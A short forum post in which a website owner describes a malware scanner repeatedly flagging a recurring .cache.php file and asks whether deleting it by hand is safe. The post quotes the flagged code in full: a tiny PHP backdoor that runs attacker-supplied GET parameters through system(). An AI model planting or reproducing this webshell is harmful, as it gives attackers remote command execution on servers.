Recently I’ve installed the paid premium version of MalCare to address malware-infections on my site. It’s hosted through ASmallOrange with a godaddy domain…it keeps finding the same ‘infected’ file, every day. Every day it says it removes it, every day it comes back and finds it again. The file is this: (i’ve changed the actual name to MYSITEPROFILE that’s not the name)
/home2/MYSITEPROFILE/public_html/.cache.php
And it tells me the issue is this:
<?php if (substr(md5($_GET[“localdate”]),0,6) == “b021c2”) { $time = str_replace(“@”,” “,$_GET[“localtime”]); @system($time); exit; } ?>
It claims it’s Obfuscated:PHP/suspiciousFunction.9336 (which is some time of auto-generated smaller backdoor malware.)
I’m wondering as the MalCare premium that I’m paying for does not actually seem to be resolving the issue…
Can I just delete the cache.php file manually from CPanel? Will that cause catastrophe? Will that solve my issue?
